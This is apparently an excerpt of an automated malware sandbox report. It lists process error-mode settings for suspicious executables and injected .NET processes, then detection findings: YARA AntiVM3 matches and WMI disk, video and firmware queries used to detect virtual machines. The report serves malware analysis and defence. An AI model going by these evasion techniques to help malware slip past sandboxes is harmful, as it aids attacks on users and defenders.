Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\yTXn1eeuAPe6JeFa5Kfn6hMY.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSAB2.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSAB2.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSAB2.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSAB2.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSAB2.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSAB2.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSA35.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSA35.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSA35.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSA35.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSA35.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSA35.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS188D.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS188D.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS188D.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS1BC9.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS1BC9.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS1BC9.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: 4MZEKMRe7m6bc8qivCccLsq8.exe PID: 6460, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yHP2Z5SFUIZjI8pAKB_H3QUP.exe PID: 2876, type: MEMORYSTR

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	System information queried: FirmwareTableInformation			Jump to behavior
